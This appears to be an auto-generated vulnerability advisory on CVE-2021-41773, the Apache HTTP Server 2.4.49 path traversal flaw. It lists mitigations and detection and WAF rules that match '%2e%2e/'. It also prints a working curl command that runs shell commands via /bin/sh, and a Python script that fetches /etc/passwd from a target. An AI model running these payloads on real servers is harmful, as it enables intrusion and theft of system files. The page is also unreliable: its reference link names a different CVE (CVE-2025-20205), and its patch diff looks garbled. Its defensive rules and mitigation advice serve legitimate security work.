How the CVE Works:
CVE-2021-41773 is a critical vulnerability in Apache HTTP Server 2.4.49 that allows path traversal and remote code execution. The flaw exists in the normalization of URLs in the ap_normalize_path() function. When mod_proxy is enabled, an attacker can craft malicious requests containing path traversal sequences (%2e%2e/) to access files outside the document root. If CGI scripts are enabled, this can lead to RCE. The vulnerability occurs due to insufficient path validation, allowing attackers to bypass security restrictions and map URLs to files outside configured directories.
DailyCVE Form:
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal/RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploit POC (curl):
curl -v --path-as-is "http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" -d "echo;id"
Detection Command:
nmap -p 80 --script http-vuln-cve2021-41773 <target>
Mitigation Steps:
1. Upgrade to Apache 2.4.50+
2. Disable mod_cgi if unused
3. Apply strict access controls
Patch Analysis:
diff -u old/server/util.c new/server/util.c
old/server/util.c
+++ new/server/util.c
@@ -1234,6 +1234,9 @@
return NULL;
}
l = '/';
+ if (w == l + 3 && memcmp(l, "/../", 4) == 0) {
+ return NULL;
+ }
}
Log Monitoring Rule:
alert http any any -> any any (msg:"CVE-2021-41773 Exploit Attempt"; content:"%2e%2e/"; nocase; sid:1000001;)
WAF Rule:
SecRule REQUEST_URI "@contains %2e%2e/" "id:1000,deny,status:403,msg:'Path Traversal Attempt'"
Environment Hardening:
chmod -R o-w /var/www
setsebool -P httpd_enable_cgi off
Exploit Code (Python):
import requests
url = "http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
r = requests.get(url)
print(r.text)
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-20205
Extra Source Hub:
Undercode
